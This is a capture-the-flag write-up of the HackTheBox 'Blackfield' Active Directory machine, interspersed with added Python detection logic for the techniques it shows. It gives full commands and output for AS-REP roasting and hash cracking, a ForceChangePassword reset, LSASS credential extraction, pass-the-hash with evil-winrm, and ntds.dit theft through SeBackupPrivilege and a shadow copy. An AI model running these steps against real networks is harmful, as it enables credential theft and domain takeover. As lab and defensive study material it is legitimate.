HackTheBox Blackfield

Writeup for HackTheBox Blackfield

Machine Synopsis

Key Exploitation Techniques

  • AS-REP Roasting to crack a Kerberos TGT hash
  • Abusing the ForceChangePassword permission on a low-privileged account
  • Credential dumping from a publicly exposed lsass.zip file
  • Leveraging SeBackupPrivilege and Volume Shadow Copy to extract the NTDS database

Enumeration

➜ Blackfield nmap -p- --min-rate 10000 10.10.10.192
...
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

The service profile clearly indicates this is a Windows Domain Controller running standard AD services.

SMB Share Enumeration

Checking for accessible SMB shares without authentication:

➜ Blackfield smbclient -N -L //10.10.10.192

        Sharename       Type      Comment
        ---------       ----      -------
        forensic        Disk      Forensic / Audit share.
        profiles$       Disk      User profiles

Accessible Shares:

  • forensic
  • profiles$

User Enumeration via SMB

The profiles$ share contained numerous user profile directories, providing a goldmine for username enumeration:

➜ Blackfield smbclient //10.10.10.192/profiles$
smb: \> ls
...
  AAlleni                             D        0  Wed Jun  3 18:47:11 2020
  ABarteski                           D        0  Wed Jun  3 18:47:11 2020
...

➜  Blackfield smbclient //10.10.10.192/profiles$ -N -c "ls" | awk '{print $1}' | grep -v '^\.$' | grep -v '^\.\.$' > smb_users.txt

Initial Access

AS-REP Roasting Attack

With our username list, I targeted accounts with Kerberos pre-authentication disabled using Impacket’s impacket-GetNPUsers:

➜  Blackfield impacket-GetNPUsers 'blackfield.local/' -dc-ip 10.10.10.192 -usersfile smb_users.txt -no-pass
...
$krb5asrep$23$support@BLACKFIELD.LOCAL:72c34522cb3f7d8cfa549e240d360c7c$d510537eef809c51dbfc5a1754f73276292eeddfd9f680b02f229bbe464de1713dfd69cd791311f65508cac8dae5bb66223fa0454e17af18dfc69ba470f88c4fef50a41e4673c4ad5ebc6728573e8a279132b04810722b22391d4ae4a7f3cceb6feff5f2fff41ca34f0cae2e97491f1e63468f1e1226c2847d818d9a1b3e97abf77de7fcc2faa830a785a27f01a7e419e7ffa12d19e23facf5ef50fff7f6537f3dda8bbb48020bf601b977a4de79fafb4bdc1898b2a222f63eb1c5a00f3f651e4444ceafa6572c18ed425903a78eb3ff9c3c3c1d3623b79fb91a85a64cd2b3b2d868e57b546e9f13d85b7e9c887885e268af5136
...

The support account had pre-authentication disabled and returned a crackable hash.

Hash Cracking

Using hashcat with the rockyou wordlist to crack the AS-REP hash:

$ hashcat -m 18200 hash.asrep /usr/share/wordlists/rockyou.txt --force
...
$krb5asrep$23$support@BLACKFIELD.LOCAL:72c34522cb3f7d8cfa549e240d360c7c$d510537eef809c51dbfc5a1754f73276292eeddfd9f680b02f229bbe464de1713dfd69cd791311f65508cac8dae5bb66223fa0454e17af18dfc69ba470f88c4fef50a41e4673c4ad5ebc6728573e8a279132b04810722b22391d4ae4a7f3cceb6feff5f2fff41ca34f0cae2e97491f1e63468f1e1226c2847d818d9a1b3e97abf77de7fcc2faa830a785a27f01a7e419e7ffa12d19e23facf5ef50fff7f6537f3dda8bbb48020bf601b977a4de79fafb4bdc1898b2a222f63eb1c5a00f3f651e4444ceafa6572c18ed425903a78eb3ff9c3c3c1d3623b79fb91a85a64cd2b3b2d868e57b546e9f13d85b7e9c887885e268af5136:#00^BlackKnight
...

Credentials Obtained: support:#00^BlackKnight

To map the AD environment and identify escalation paths, I used BloodHound for comprehensive enumeration.

➜ Blackfield bloodhound-ce-python -d blackfield.local -u support -p '#00^BlackKnight' -c all -ns 10.10.10.192

The BloodHound analysis revealed that the support user had the ForceChangePassword permission over the audit2020 account. This is a critical AD misconfiguration that allows a user to reset another user’s password without knowing the original password.

Exploiting ForceChangePassword Permission

This permission allows changing another user’s password without knowing the current one:

➜  Blackfield bloodyAD --host "10.10.10.192" -d "blackfield.local" -u "support" -p "#00^BlackKnight" set password "audit2020" "P@ssw0rd"
[+] Password changed successfully!
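Detection logic for the two misuses above (an account that can be AS-REP roasted, and a password reset driven by a ForceChangePassword ACE), as an added example that is not part of the original writeup: it runs over constructed Security-log records in a flat key=value form made up for this example, with field names taken from Microsoft's documentation of events 4768 and 4724; the source addresses and the helpdesk allowlist are assumptions.

```python
from collections import defaultdict

# Constructed sample records (hypothetical, not real log exports). 4768 = Kerberos TGT
# requested, 4724 = an attempt was made to reset an account's password. 192.0.2.x is a
# documentation address range standing in for the requesting host.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=svc_backup IpAddress=192.0.2.10 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=AAlleni IpAddress=192.0.2.10 PreAuthType=0 TicketEncryptionType=0x17 Status=0x6",
    "EventID=4768 TargetUserName=ABarteski IpAddress=192.0.2.10 PreAuthType=0 TicketEncryptionType=0x17 Status=0x6",
    "EventID=4768 TargetUserName=support IpAddress=192.0.2.10 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4724 SubjectUserName=support TargetUserName=audit2020 IpAddress=192.0.2.10 Status=0x0",
    "EventID=4724 SubjectUserName=helpdesk01 TargetUserName=AAlleni IpAddress=192.0.2.20 Status=0x0",
]

def parse_event(line):
    """Split 'key=value key=value' into a dict (values here contain no spaces)."""
    return dict(field.split("=", 1) for field in line.split())

def asrep_roast_candidates(events):
    """Successful 4768 with PreAuthType 0 (logon without pre-authentication) and an
    RC4 (0x17) ticket: exactly the accounts GetNPUsers gets a crackable blob for.
    Fix: clear DONT_REQ_PREAUTH on the account, or at minimum require AES."""
    return [e["TargetUserName"] for e in events
            if e["EventID"] == "4768" and e["PreAuthType"] == "0"
            and e["TicketEncryptionType"] == "0x17" and e["Status"] == "0x0"]

def username_sweeps(events, threshold=3):
    """Distinct principals requested per source host: a -usersfile sweep asks for
    many names in a burst, most of them failing with 0x6 (client not found)."""
    seen = defaultdict(set)
    for e in events:
        if e["EventID"] == "4768":
            seen[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: len(names) for ip, names in seen.items() if len(names) >= threshold}

def unexpected_password_resets(events, allowed_resetters=frozenset()):
    """4724 where the subject resets someone else's password and is not on the
    helpdesk allowlist: the footprint of a ForceChangePassword right being used."""
    return [(e["SubjectUserName"], e["TargetUserName"]) for e in events
            if e["EventID"] == "4724"
            and e["SubjectUserName"].lower() != e["TargetUserName"].lower()
            and e["SubjectUserName"].lower() not in allowed_resetters]

def triage(lines, allowed_resetters=frozenset({"helpdesk01"})):
    events = [parse_event(l) for l in lines]
    return {
        "asrep_roastable": asrep_roast_candidates(events),
        "sweeps": username_sweeps(events),
        "resets": unexpected_password_resets(events, allowed_resetters),
    }
```

On the sample data only `support` is flagged as roastable, the sweep from one host covers four names, and the only reset outside the allowlist is `support` resetting `audit2020`.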

Accessing the Forensic Share

With audit2020 credentials, I gained access to the forensic share containing sensitive files:

➜  Blackfield smbclient //10.10.10.192/forensic -U audit2020
Password for [WORKGROUP\audit2020]: P@ssw0rd
Try "help" to get a list of possible commands.
smb: \> cd memory_analysis
smb: \memory_analysis\> get lsass.zip 

Memory Dump Analysis

After downloading and extracting the LSASS dump, I used pypykatz to extract stored credentials:

➜  Blackfield unzip lsass.zip && sudo pypykatz lsa minidump lsass.DMP
...
== LogonSession ==
...
       == MSV ==
        Username: svc_backup
        Domain: BLACKFIELD
        NT: 9658d1d1dcd9250115e2205d9f48400d
...

Extracted Credentials:

  • Username: svc_backup
  • NTLM Hash: 9658d1d1dcd9250115e2205d9f48400d

I then used evil-winrm with the svc_backup NTLM hash to gain a shell on the target.

➜ Blackfield evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

Privilege Escalation

After gaining a shell, the first step was to identify the privileges of the svc_backup account using whoami /priv. The output clearly showed that the SeBackupPrivilege was enabled.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeBackupPrivilege lets its holder read any file on the system regardless of the file's ACL. My strategy was to extract the NTDS.dit file (the AD database) together with the SYSTEM registry hive, which holds the boot key needed to decrypt the hashes stored in it.

Setting Up the Attack Tools

I downloaded the SeBackupPrivilege abuse toolkit:

➜ Blackfield wget 'https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll?raw=true' -O SeBackupPrivilegeUtils.dll
➜ Blackfield wget 'https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll?raw=true' -O SeBackupPrivilegeCmdLets.dll

Then I uploaded the two DLLs to the target machine using evil-winrm's upload command.

*Evil-WinRM* PS C:\Users\svc_backup\Desktop> upload SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> upload SeBackupPrivilegeUtils.dll

Creating Volume Shadow Copy

To access locked files, I created a Volume Shadow Copy using diskshadow:

➜  Blackfield cat vss.dsh 
set context persistent nowriters
set metadata C:\Windows\Temp\vss.cab
add volume c: alias VSS_C
create
expose %VSS_C% z:
➜  Blackfield unix2dos vss.dsh                                 
unix2dos: converting file vss.dsh to DOS format...

Why Shadow Copy: The NTDS.dit file is locked by the AD service and cannot be copied directly. Volume Shadow Copy creates a point-in-time snapshot where files can be accessed without the locking service interfering.

# Upload and execute the shadow copy script
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload vss.dsh
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s vss.dsh
...
# The shadow copy was successfully exposed as z:\.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module .\SeBackupPrivilegeUtils.dll

# Copy the NTDS database and SYSTEM hive
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit ntds.dit
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg.exe save hklm\system system.sav
The operation completed successfully.

# Download files for offline analysis
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download ntds.dit
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.sav
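The same chain seen from the domain controller's event log, as an added example that is not from the original writeup: it correlates a logon that was granted SeBackupPrivilege (event 4672) with the snapshot and hive-export commands the same account launches afterwards (event 4688 with command-line auditing on), over constructed sample events in a made-up key=value form; the account names, timestamps and the 30-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed DC security events (hypothetical, not real exports). 4672 = special
# privileges assigned to a new logon, 4688 = process creation with command line
# auditing enabled. Times are ISO-8601 so they can be compared.
SAMPLE_EVENTS = [
    'Time=2020-06-03T18:50:00 EventID=4672 SubjectUserName=svc_backup PrivilegeList=SeBackupPrivilege,SeRestorePrivilege',
    'Time=2020-06-03T18:52:10 EventID=4688 SubjectUserName=svc_backup NewProcessName=C:\\Windows\\System32\\diskshadow.exe CommandLine="diskshadow /s vss.dsh"',
    'Time=2020-06-03T18:53:40 EventID=4688 SubjectUserName=svc_backup NewProcessName=C:\\Windows\\System32\\reg.exe CommandLine="reg.exe save hklm\\system system.sav"',
    'Time=2020-06-03T18:55:00 EventID=4688 SubjectUserName=svc_backup NewProcessName=C:\\Windows\\System32\\reg.exe CommandLine="reg.exe query hklm\\software"',
    'Time=2020-06-03T21:00:00 EventID=4672 SubjectUserName=backupadmin PrivilegeList=SeBackupPrivilege',
    'Time=2020-06-03T21:05:00 EventID=4688 SubjectUserName=backupadmin NewProcessName="C:\\Program Files\\Backup\\agent.exe" CommandLine="agent.exe --nightly"',
]

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_event(line):
    """key=value pairs; a value is double-quoted when it contains spaces."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}

# Binaries that turn SeBackupPrivilege into an offline copy of the directory:
# diskshadow/vssadmin snapshot the volume so the locked ntds.dit becomes readable,
# and "reg save hklm\system" exports the hive holding the boot key that decrypts it.
SUSPECT = {"diskshadow.exe", "vssadmin.exe", "reg.exe"}

def suspicious_process(e):
    exe = e["NewProcessName"].rsplit("\\", 1)[-1].lower()
    if exe == "reg.exe":
        return " save " in e["CommandLine"].lower()   # a plain reg query is noise
    return exe in SUSPECT

def backup_privilege_abuse(events, window=timedelta(minutes=30)):
    """For every logon granted SeBackupPrivilege, inspect what the same account
    launches inside the window and report snapshot / hive-export tooling."""
    alerts = []
    for g in events:
        if g["EventID"] != "4672" or "SeBackupPrivilege" not in g["PrivilegeList"].split(","):
            continue
        t0 = datetime.fromisoformat(g["Time"])
        for e in events:
            if e["EventID"] != "4688" or e["SubjectUserName"] != g["SubjectUserName"]:
                continue
            if t0 <= datetime.fromisoformat(e["Time"]) <= t0 + window and suspicious_process(e):
                alerts.append((g["SubjectUserName"], e["Time"], e["CommandLine"]))
    return alerts

def run(lines):
    return backup_privilege_abuse([parse_event(l) for l in lines])
```

The nightly backup agent under `backupadmin` produces no alert, while the two commands run by `svc_backup` after its privileged logon do; the structural fix is to keep service accounts holding SeBackupPrivilege out of interactive and WinRM logons on domain controllers.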

Using impacket-secretsdump to extract all domain hashes:

➜  Blackfield impacket-secretsdump -system system.sav -ntds ntds.dit LOCAL
...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
...

Logged in as domain admin using pass-the-hash:

➜ Blackfield evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee

This post is licensed under CC BY 4.0 by the author.